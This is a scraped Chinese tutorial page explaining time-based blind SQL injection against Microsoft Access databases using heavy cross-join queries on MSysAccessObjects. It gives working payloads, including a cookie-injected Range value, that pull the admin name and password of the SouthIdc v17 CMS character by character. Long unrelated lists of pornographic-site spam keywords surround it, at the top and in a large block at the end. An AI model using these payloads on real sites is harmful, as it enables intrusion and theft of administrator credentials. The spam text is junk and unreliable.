欧美三区四区_av先锋影音资源站_亚洲第一论坛sis_影音先锋2020色资源网_亚洲精品社区_在线免费观看av网站_国产一区二区伦理_亚洲欧美视频一区二区_99视频精品全部免费在线_精精国产xxxx视频在线

Access數(shù)據(jù)庫(kù)基于時(shí)間sql盲注的實(shí)現(xiàn)記錄_Access數(shù)據(jù)庫(kù)教程

編輯Tag賺U幣
教程Tag:暫無Tag,歡迎添加,賺取U幣!

推薦:關(guān)閉Access2010數(shù)據(jù)庫(kù)默認(rèn)輸入法的方法
1.打開Access2010,點(diǎn)擊開始選項(xiàng)卡,選擇選項(xiàng) 2.在打開的Access選項(xiàng)窗口中,在左邊的菜單中選擇客戶端設(shè)置,在右邊的窗口中將數(shù)據(jù)表IME控件勾選,確定即可,相關(guān)截圖如下所示:

   Access是微軟把數(shù)據(jù)庫(kù)引擎的圖形用戶界面和軟件開發(fā)工具結(jié)合在一起的一個(gè)數(shù)據(jù)庫(kù)管理系統(tǒng)。本文我們來看看Access數(shù)據(jù)庫(kù)基于時(shí)間sql盲注的實(shí)現(xiàn)記錄。

  概述

  眾所周知,access數(shù)據(jù)庫(kù)是不支持基于時(shí)間的盲注方式,但是我們可以利用access的系統(tǒng)表MSysAccessObjects,通過多負(fù)荷查詢(Heavy Queries)的方式實(shí)現(xiàn)。

  初步探究

  我們以SouthIdcv17數(shù)據(jù)庫(kù)為例

  執(zhí)行 select * from Southidc_About ,返回結(jié)果如下圖。

Access數(shù)據(jù)庫(kù)基于時(shí)間sql盲注的實(shí)現(xiàn)記錄    模板無憂

  如何實(shí)現(xiàn)time base injection 呢?我們就要利用這條語句

  SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,

  MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12

  具體實(shí)現(xiàn)方式如下:

  select * from Southidc_About where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,

  MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from

  Southidc_Admin)=97

  我們可以執(zhí)行一次,觀察效果。

  很明顯,經(jīng)歷了大約40s才返回結(jié)果

Access數(shù)據(jù)庫(kù)基于時(shí)間sql盲注的實(shí)現(xiàn)記錄

  當(dāng)我們執(zhí)行如下語句時(shí),也就是把最后的97改為96

  select * from Southidc_About where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,

  MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from

  Southidc_Admin)=96

Access數(shù)據(jù)庫(kù)基于時(shí)間sql盲注的實(shí)現(xiàn)記錄

  很快就執(zhí)行完畢,沒有延時(shí)。

  很明顯,我們通過where條件后的

  (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,

  MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0

  實(shí)現(xiàn)了延時(shí),但需要注意的是這里where后的條件是有順序的,實(shí)現(xiàn)延時(shí)的語句必須在

  1(select top 1 asc(mid(AdminName+Password,1,1)) from Southidc_Admin)=97

  之前,為什么呢?實(shí)驗(yàn)得出的結(jié)論。

  實(shí)例實(shí)現(xiàn)

  在SouthIdc 17 中,有一處sql注入漏洞,但是常規(guī)的方法并不能成功利用漏洞。漏洞代碼如下:

Access數(shù)據(jù)庫(kù)基于時(shí)間sql盲注的實(shí)現(xiàn)記錄

  雖然程序把Post和Get的數(shù)據(jù)進(jìn)行了過濾,但是我們依舊我可以通過Cookie的提交方式進(jìn)行注入。

  好,我們實(shí)現(xiàn)一下注入利用。

  我們需要注入的語句為:

  select * from Southidc_"&request("Range")&"Sort where ViewFlag and ParentID="&ParentID&" order by ID asc

  通過提交cookie

  Range=DownSort where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6, MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from Southidc_Admin)=32 and 1=1 union select NULL,NULL,NULL,NULL,NULL,NULL from Southidc_image

  ParentID為程序上部傳進(jìn)的值,最終的語句為:

  1select * from Southidc_DownSort where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6, MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from Southidc_Admin)=32 and 1=1 union select NULL,NULL,NULL,NULL,NULL,NULL from Southidc_imageSort where ViewFlag and ParentID=1

  我們可以在查詢器中看一下效果

  96時(shí),不延時(shí),如圖:

Access數(shù)據(jù)庫(kù)基于時(shí)間sql盲注的實(shí)現(xiàn)記錄

  97時(shí)延時(shí),效果如下圖:

Access數(shù)據(jù)庫(kù)基于時(shí)間sql盲注的實(shí)現(xiàn)記錄

  接下來,我們可以利用上述語句進(jìn)行exp的編寫,筆者這里用python

  核心代碼如下:

Access數(shù)據(jù)庫(kù)基于時(shí)間sql盲注的實(shí)現(xiàn)記錄

分享:IIS中利用重定向URL來防止Access數(shù)據(jù)庫(kù)被下載的方法
對(duì)于ASP+Access開發(fā)的網(wǎng)站,安全性最最讓人擔(dān)憂的就是Access數(shù)據(jù)庫(kù)可以隨意下載,當(dāng)然我們可以通過一些修改數(shù)據(jù)庫(kù)名稱的手段進(jìn)行盡量的防護(hù),但歸根結(jié)底是不徹底的。所以今天就來談?wù)勗贗IS中利用重定向URL來防止Access數(shù)據(jù)庫(kù)被下載的方法。 此方法需要你有IIS的管理權(quán)

來源:模板無憂//所屬分類:Access數(shù)據(jù)庫(kù)教程/更新時(shí)間:2015-02-10
相關(guān)Access數(shù)據(jù)庫(kù)教程
美女久久久久久久久| 国内精品一区二区三区| 亚洲欧美电影在线观看| 欧美成人777| 嫩草国产精品入口| 欧美激情一区二区| 精品中文字幕在线| 成年人免费在线播放| 中文字幕第315页| 韩日在线一区| 欧美亚洲一区二区在线| 亚洲一区免费网站| 超碰男人的天堂| 欧美一级免费| 91丨九色丨国产丨porny| 中文字幕亚洲一区二区三区| 国产欧美日韩亚洲精品| 看片网站欧美日韩| 久久久久久久久久电影| 久久精品男人天堂| 国产极品在线视频| 97人人爽人人爽人人爽| 亚洲综合电影一区二区三区| 欧美日韩高清一区| 欧美另类高清视频在线| 午夜免费久久看| 欧美黄色成人网| 孩娇小videos精品| 色综合久久久久久| 美女色狠狠久久| 国内精品久久久久影院一蜜桃| 亚洲国产另类久久精品| 一区二区精品在线观看| 国产精品久久久免费视频| 自拍偷拍欧美专区| 欧美日韩国产精品成人| 欧美动漫一区二区| 精品午夜福利视频| 欧美激情综合色综合啪啪| 欧美系列一区二区| 欧美二区在线看| 国产精品50页| 欧美精品二区| 欧美一级黄色录像| 在线观看福利一区| 中文字幕人妻一区二区在线视频 | 亚洲午夜精品久久| 日韩人妻精品中文字幕| 99国内精品| 亚洲激情在线观看| 亚洲 自拍 另类小说综合图区| 国产露脸91国语对白| 久久99精品久久久久婷婷| 亚洲香蕉成视频在线观看| 亚洲熟妇国产熟妇肥婆| 六月婷婷综合网| 床上的激情91.| 色综合久久天天综线观看| 在线看免费毛片| 国产95亚洲| 亚洲欧美aⅴ...| 91色精品视频在线| 久久免费看少妇高潮v片特黄| 国产精品99久久久久久动医院| 欧美日韩亚洲综合| 亚洲最新免费视频| 国产精品欧美亚洲| 国产激情视频一区二区三区欧美 | 日韩av电影院| xxxx日本黄色| 欧美日一区二区| 欧美午夜片在线看| 一级全黄肉体裸体全过程| 国产又黄又猛又爽| 国产成人免费av在线| 高清欧美一区二区三区| 内射中出日韩无国产剧情| 免费看av成人| 欧美日韩卡一卡二| youjizz.com在线观看| 高清一区二区三区四区| caoporen国产精品视频| 7777kkkk成人观看| 精品人伦一区二区三电影| 久久美女视频| 日韩一级二级三级| www在线观看免费| 嫩草伊人久久精品少妇av杨幂| 国产精品福利一区二区| 99re在线国产| 蜜臀精品一区二区三区| 蜜桃视频一区二区三区在线观看| 久久久精品视频在线观看| xxxwww国产| 日韩av有码| 精品免费日韩av| 久久精品99国产| 国产一区二区三区免费在线| 精品美女国产在线| 亚洲高清在线观看一区| www黄色网址| 日本一区二区三区四区在线视频| 91精品中文在线| 国产又大又黑又粗免费视频| 免费久久99精品国产| 欧美激情aaaa| 999久久久国产| 91久久夜色精品国产九色| 中文字幕国内精品| 伦理片一区二区| 国产精品福利在线观看播放| 日韩av影片在线观看| 99日在线视频| 狠狠色丁香婷婷综合影院| 日韩欧美在线网站| 欧美婷婷精品激情| 日韩一级电影| 欧美一级日韩免费不卡| 黄色国产小视频| 国偷自产av一区二区三区| 欧美日韩成人综合在线一区二区| 免费观看国产精品视频| 精品999日本久久久影院| 91精品1区2区| 国产原创中文在线观看| 国产一区2区在线观看| 欧美怡红院视频| 欧美国产激情视频| 中文在线综合| 欧美一级爆毛片| 一级黄色录像在线观看| 国产不卡av一区二区| 欧美精品一区二区三区蜜桃视频| 亚洲精品成人在线播放| 俺要去色综合狠狠| 亚洲欧美日韩中文在线制服| 性高潮免费视频| 欧美日本一区| 欧美夫妻性生活视频| 精品无码久久久久成人漫画 | 欧美日韩中文字幕在线播放| 欧美电影免费观看网站| 亚洲综合色一区| 秋霞视频一区二区| 亚洲欧美日韩中文播放 | 亚洲丰满在线| 成人福利一区二区| 欧美中文字幕久久| 精品久久久久久久免费人妻| 一区二区的视频| 国产欧美日韩精品a在线观看| 久久国产精品精品国产色婷婷| www.国产视频| 亚洲综合999| 国产精品自拍合集| eeuss国产一区二区三区四区| 日韩一区二区不卡| 熟妇无码乱子成人精品| 欧美在线观看天堂一区二区三区| 不卡av在线网站| 超碰在线国产97| 国产成人精品午夜视频免费| 成人免费观看网站| 风流少妇一区二区三区91| 精品久久久久久| 男女高潮又爽又黄又无遮挡| 欧美禁忌电影网| 亚洲一区二区久久| 91动漫免费网站| 国产在线不卡一卡二卡三卡四卡| 99re在线| 韩国久久久久久| 精品1区2区3区| 色综合五月婷婷| 伊人精品在线| 国产精品av网站| 国产精品主播一区二区| 亚洲日本在线看| 分分操这里只有精品| 精品一区在线| 久久九九免费视频| 久久精品国产亚洲av麻豆色欲| 99这里都是精品| 日韩免费电影一区二区| 国产精品一区二区精品| 亚洲成av人影院在线观看| 无套内谢大学处破女www小说| 日韩vs国产vs欧美| 91色精品视频在线| 亚洲欧美日韩精品永久在线| 欧美三级日韩三级国产三级| www.日本久久| 久久久综合网| 亚洲free嫩bbb| 亚洲欧美日韩动漫| 欧美一区二区精品在线| 国产福利短视频| 国产在线精品免费| 欧美日韩最好看的视频| 欧美国产中文高清| 亚洲人成网站777色婷婷| 99自拍视频在线| 久久久青草青青国产亚洲免观| 99re99热| 精品日韩欧美一区| 色综合久久悠悠| 中文字幕网址在线| 精品国产乱码久久久久久天美 | 日韩亚洲国产精品| 国产在线观看一区二区三区 | 久久天天躁狠狠躁夜夜躁2014 | 久久精品国产清高在天天线| 91精品美女在线| 欧美大胆成人| 亚洲大胆人体视频| 欧美成人久久久免费播放| 26uuuu精品一区二区| 欧美与动交zoz0z| 精品国产一区二区三区久久久樱花 | 欧美一级日韩免费不卡| 97在线观看免费视频| 成人国产精品视频| 中国一级黄色录像| 日产精品一区二区| 欧美在线视频免费观看| www.色播.com| 777色狠狠一区二区三区| 精品人妻一区二区三区视频| 福利一区二区在线| 香蕉精品视频在线| 久久中文字幕av一区二区不卡| 91精品国产777在线观看| 国产不卡精品视频| 91精品国产一区二区人妖| 亚洲一区 欧美| 国产偷国产偷亚洲高清人白洁| av免费看网址| 国产综合精品一区| 91亚洲精品丁香在线观看| 国产精品黄色片| 一区二区av在线| 手机看片久久久| 精品国产福利视频| 三级黄色片网站| 9久草视频在线视频精品| 妞干网在线观看视频| 亚洲视频一二| 国产一区免费观看| 丁香5月婷婷久久| 久久久久免费视频| 亚洲精品成人电影| 精品国产乱码久久久久久浪潮| 免费在线观看av网址| 一区二区三区在线免费视频| www.成年人| 国产精品69久久久久水密桃| 男人j进女人j| 黄色成人av网站| 国产伦精品一区二区三区视频免费 | 欧美aaaaaa午夜精品| 日韩hmxxxx| 久久一区二区三区喷水| 91久久精品久久国产性色也91| 年轻的保姆91精品| 欧美极品少妇全裸体| 黄色美女一级片| 亚洲欧美国产精品专区久久| 精品人妻一区二区三区潮喷在线 | 午夜精品久久久久久久久久蜜桃| 日韩成人av网| 婷婷激情五月网| 在线观看视频一区二区欧美日韩| 夜夜春很很躁夜夜躁| 国产精品免费视频网站| 国产大片一区二区三区| 高清不卡一区二区在线| 国产白丝袜美女久久久久| 久久一区二区三区四区五区| 日韩精品久久一区二区三区| 国产精品久久久久一区二区三区厕所| 国产视频观看一区| 亚洲一区二区三区在线免费| 高清在线视频日韩欧美| 全亚洲第一av番号网站| 中文字幕一区二区三区电影| 国产毛片久久久久| 亚洲精品美女视频| 中文字幕网址在线| 亚洲电影免费观看高清完整版在线| 日韩不卡在线播放| 欧美精品一级二级| 日韩xxxxxxxxx| 欧美视频精品在线| 精品肉丝脚一区二区三区| 在线观看亚洲精品视频| 欧美人妻精品一区二区免费看| 欧美性xxxx在线播放| 天天色影综合网| 欧美午夜电影在线| 超碰手机在线观看| 91国偷自产一区二区使用方法| 日韩欧美国产成人精品免费| 天天综合色天天| 欧美高清视频一区二区三区| 色婷婷综合久久| 久久久久国产精品夜夜夜夜夜| 色域天天综合网| 久久久久久久久97| 欧美色男人天堂| 天天插天天操天天干| 日韩一级精品视频在线观看| 无码人妻精品一区二区三区蜜桃91| 日韩一级黄色片| 一级欧美一级日韩| 国产午夜精品视频| 女人18毛片水真多18精品| 久久久国产一区| 国产欧美自拍| 人人澡人人澡人人看欧美| 成人性生交大片免费看中文视频 | 99成人在线观看| 在线亚洲一区二区| 国产尤物在线视频| 欧美亚洲国产怡红院影院| 欧美激情网友自拍| 99在线免费视频观看| 欧美福利影院| 色之综合天天综合色天天棕色 | 国产精品美女黄网| 亚洲视频在线免费| 鲁鲁视频www一区二区| 黄色在线一区| 欧美性猛交内射兽交老熟妇| 久久国产剧场电影| 国产精品涩涩涩视频网站| av一二三不卡影片| 在线观看免费视频国产| 一区二区成人在线| 国产精品麻豆一区| 欧美日韩一本到| 在线观看日韩一区二区| 在线视频日本亚洲性| 偷拍精品精品一区二区三区| 4388成人网| 综合国产视频| 欧美日韩一区在线视频| 色婷婷狠狠18| 精品亚洲成a人| 国产免费中文字幕| 亚洲免费观看在线观看| 久久国产高清视频| 日韩欧美自拍偷拍| 亚洲精品久久久久久久久久| 欧美成人在线网站| 99re热精品视频| 国产自产精品| 亚洲欧美日韩在线观看a三区 | 日韩高清第一页| 中文字幕一区二区三区av| 91导航在线观看| 91.com视频| 精品久久久免费视频| 欧美极品少妇xxxxx| 日韩极品在线| 日本免费高清一区二区| 蜜桃视频第一区免费观看| 欧美美女一级片| 亚洲精品伦理在线| 三上悠亚影音先锋| 欧美日韩另类一区| 国产激情久久久久久熟女老人av| 欧美激情视频网址| 亚洲系列另类av| 亚洲区一区二区三区| 国产精品一区二区三区乱码| 亚洲妇女无套内射精| 精品久久久中文| 在线观看亚洲一区二区| 久久999免费视频| 亚洲三级网址| 亚洲资源视频| 成人网在线播放| 韩国女同性做爰三级| 欧美一区二区性放荡片| 天天操天天插天天射| 国产精品久久久亚洲| 欧美精品黄色| 亚洲天堂av线| 亚洲成av人片在线观看无码| www.久久久久久久| 九九热r在线视频精品| 日韩极品少妇| 黄色a级在线观看| 久久午夜色播影院免费高清| 午夜爱爱毛片xxxx视频免费看| 亚洲福利在线观看| 久久麻豆视频| 国产精品国产精品| 久久99蜜桃精品| 亚洲欧美日本一区|